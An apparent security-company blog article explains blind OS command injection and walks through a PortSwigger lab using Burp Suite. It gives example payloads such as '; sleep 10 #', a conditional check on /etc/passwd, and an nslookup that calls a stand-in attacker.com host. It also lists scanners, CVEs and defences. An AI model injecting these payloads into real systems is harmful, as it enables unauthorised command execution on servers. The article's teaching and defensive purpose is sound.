16 Feb, 2024

Blind OS command injection

Blind OS command injection is a type of attack against web applications in which an attacker can execute arbitrary commands on the server hosting the web application without directly displaying the results of those commands. This type of vulnerability occurs when an application, without properly filtering or validating input data, passes it to system commands. Unlike classic OS command injection, in blind injection the attacker does not receive a direct response from the application about the result of executed commands, which complicates the process of exploiting the vulnerability.

Types of blind OS command injections


In this approach, the attacker adds a command to the injection that causes a delay in execution, such as the sleep command in UNIX-like systems or timeout in Windows. If the attacker observes a delay in the application’s response, this serves as an indicator that the injected command has been executed. This allows brute-force attacks, although such attacks can take a significant amount of time.

Example of a command that can be used for this type:

					; sleep 10 #



In this example, after the main command (denoted here by the ; symbol) is completed, the sleep command is executed, which causes the process to “sleep” for 10 seconds. If the server response is delayed for the appropriate amount of time, this indicates that the command was successfully executed.


In this case, an attacker uses commands that can change data or system state and then attempts to detect those changes through a web application. For example, an attacker might create or delete a file and then attempt to access that file through a web application. If the file is available or its status has changed (e.g., the file has been deleted), the attacker receives a confirmation that the command has been executed.

Example of a command that can be used for this type:

					; touch /tmp/testfile #


This example creates a new file(/tmp/testfile) on the server. An attacker can then verify that the file has been created, for example, by attempting to access it via a web application. Successful access to the file confirms that the command has been executed.


In this case, the attacker constructs injections in such a way that the result of executing a command depends on a logical condition. For example, if the condition is true, the command causes a certain change or delay, and if it is false, it causes a different change or delay. Based on the differences in the responses or behaviour of the application, the attacker can draw conclusions about the system.

Example of a command that can be used for this type:

					; [ -f /etc/passwd ] && sleep 5 #



In this case, the command checks if the /etc/passwd file exists. If the file exists (the condition is true), executing the sleep command causes the system to “sleep” for 5 seconds. The difference in the server response time allows us to conclude that the file exists.


This type of attack assumes that an attacker can force a server to execute commands that initiate external network communications, such as sending data to the attacker’s server. This can be implemented through commands that cause the server to perform DNS queries, send HTTP requests, or initiate other types of network communication. The attacker can then monitor these requests to confirm the execution of the injected command.

Example of a command that can be used for this type:

					; nslookup example.com attacker.com #



This command attempts to perform a DNS query to example.com, but the results are sent to attacker.com (the attacker’s domain). The attacker can monitor queries to their server to confirm that the command has been executed.

Example of vulnerability exploitation

To better understand the Blind OS command injection vulnerability, let’s take a look at one of the labs from PortSwigger, a well-known web security company. This lab contains a vulnerability related to blind OS command injection in a feedback function.

Let’s start by simply exploring the functionality of the feedback function.

The site has 4 fields to input information, let’s try to send something, and capture the request using the Burp tool.

Ok, the next step is to send this request to Repeater to see the server’s responses to the requests. After that, let’s modify the request by adding our payload to the email function. I will use the payload & sleep 10 # which I will encode into URL format (In burp this can be done with ctrl + u). Let’s send our request!

As we can see the service responded to us after 10000 milliseconds, which is equal to 10 seconds, which confirmed our vulnerability!

Scanners that detect vulnerabilities

  1. Nikto is an open-source web server scanner that conducts comprehensive tests on web servers to detect a multitude of vulnerabilities, including Blind OS Command Injection.

  2. OWASP ZAP is a widely-used open-source tool for web application security testing. It offers features to identify vulnerabilities such as Blind OS Command Injection through both automated and manual testing methods.

  3. Acunetix is a web application vulnerability scanner capable of identifying a broad spectrum of vulnerabilities, including Blind OS Command Injection, within web applications.

  4. Burp Suite is a popular toolkit for web application security testing. It includes a scanner module capable of automatically detecting various vulnerabilities, including Blind OS Command Injection, via its active and passive scanning capabilities.

  5. OpenVAS (Open VULNERABILITY ASSESSMENT System) is an open-source vulnerability scanner that can detect vulnerabilities in networks and applications, including Blind OS Command Injection.

  6. Qualys offers a vulnerability management platform that includes scanning features to detect Blind OS Command Injection vulnerabilities, among other security issues in networks and web applications.

  7. Nessus is a widely-used vulnerability scanner that can detect a wide range of vulnerabilities, including Blind OS Command Injection. It is available in both free and paid versions.

Average CVSS score for Blind OS command injection

The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity. The CVSS score can range from 0 to 10, where 10 represents the highest level of severity.

For Blind OS Command Injection vulnerabilities, the CVSS score can vary significantly based on specific factors such as the complexity of the attack, the level of privileges required, the level of interaction required from the user, the impact on confidentiality, integrity, and availability, and other contextual factors.

However, because OS command injection vulnerabilities typically allow an attacker to execute arbitrary commands on the vulnerable system, they are often rated as High severity. This means that the CVSS base score for such vulnerabilities is usually 7.0 or higher. In many cases, especially when the vulnerability is easy to exploit and leads to significant impact on the affected system, the CVSS score can be close to 10.

CVES related to Blind OS command injection

CVE-2021-46422: This CVE concerns the Telesquare SDT-CW3B1 1.1.0 that is affected by an OS command injection vulnerability allowing a remote attacker to execute OS commands without authentication. It has a critical severity with a CVSS score of 9.8​​.

CVE-2021-25296, CVE-2021-25297, CVE-2021-25298: These CVEs are related to NagiosXI versions 5.5.6 to 5.7.5 and involve command injection vulnerabilities. The vulnerabilities are significant, with some of them having CVSS scores as high as 8.8/10, indicating their high impact​​.

CVE-2023-29084: This CVE pertains to a command injection vulnerability in ManageEngine ADManager Plus, highlighting the importance of proper input sanitization to prevent such vulnerabilities​​.

CVE-2014-6277, CVE-2014-6278, CVE-2014-7186, and CVE-2014-7187: These CVEs are related to the Shellshock vulnerability, which is a type of Bash command injection vulnerability. The Shellshock vulnerability is notable for its wide impact and the variety of related CVEs that were identified as part of the broader issue​​.

To study Blind OS command injection

  1. Start with a clear understanding of what OS Command Injection is, focusing on how Blind OS Command Injection differs from regular Command Injection. Blind OS Command Injection occurs when an application executes an attacker’s commands on the server without properly sanitizing user input, and the output of these commands is not directly returned to the attacker. This makes it “blind” since the attacker cannot see the outcome of the executed command directly.

  2. Study how to detect Blind OS Command Injection vulnerabilities. Since the output is not visible, other techniques such as time delays and out-of-band (OAST) techniques are used for detection. For example, inserting a sleep command can delay the response, indicating the presence of a vulnerability.

  3. Understand different methods to exploit these vulnerabilities. This includes using time delays, as mentioned above, and techniques for exfiltrating data using DNS queries or other out-of-band channels.

  4. Look into documented cases of Blind OS Command Injection vulnerabilities, such as CVEs. This can provide insight into how these vulnerabilities are discovered and exploited in real-world applications. The CVE-2021-46422 and CVE-2023-29084 are examples where understanding the specific vulnerability and its context can be educational.

  5. Engage with interactive labs and challenges that simulate real-world applications with these vulnerabilities. PortSwigger Web Security Academy and OWASP WebGoat are excellent resources that provide hands-on experience.

  6. Learn about the best practices for preventing Blind OS Command Injection vulnerabilities, including input validation, use of safe APIs, parameterized commands, and the principle of least privilege.

  7. Stay updated with the latest research, talks, and articles from security conferences and journals. Security researchers often share novel detection and exploitation techniques, as well as advanced mitigation strategies.

  8. Participate in forums and communities such as Stack Overflow, Reddit’s /r/netsec, or OWASP local chapters. Sharing knowledge and discussing with peers can enhance your understanding and keep you updated with the latest trends and techniques.

How to be protected from Blind OS command injection

  1. The primary defense against command injection is to avoid calling OS commands directly from your application. Whenever possible, use built-in library functions or APIs that perform the desired functionality without invoking shell commands. This approach reduces the attack surface by eliminating the possibility of command injection entirely.

  2. When invoking system commands is unavoidable, use safe functions like execvp instead of system() in C++ to execute system commands. The execvp function is safer because it requires the user to provide a list of arguments separately from the command, reducing the risk of injecting additional commands.

  3. Ensure that all user-supplied input is strictly validated and sanitized before including it as part of a system command. This involves checking the input for special characters or patterns that could be used maliciously and removing or neutralizing them. It’s also beneficial to use allow lists to restrict inputs to known safe values.

  4. Wherever possible, use structured mechanisms that automatically enforce the separation between data and command, such as parameterized APIs. This method ensures that user input cannot be interpreted as command or argument injections.

  5. Implement thorough security testing practices, including both automated tools and manual expert review, to identify and remediate potential vulnerabilities in your applications.


In conclusion, Blind OS Command Injection is a critical security vulnerability that can allow attackers to execute unauthorized commands on a server, leading to potentially severe consequences for web applications and their underlying systems. Preventing such attacks requires a multifaceted approach that includes avoiding the use of direct system commands, implementing strict input validation and sanitization, employing safe coding practices, and using parameterized APIs wherever possible. Regular security testing, maintaining up-to-date systems, and adhering to the principle of least privilege are also key components of a robust defense strategy against command injection attacks. By understanding the risks and implementing these best practices, developers and security professionals can significantly reduce the vulnerability of their systems to Blind OS Command Injection and safeguard the integrity of their applications and data.

Other Services

Ready to secure?

Let's get in touch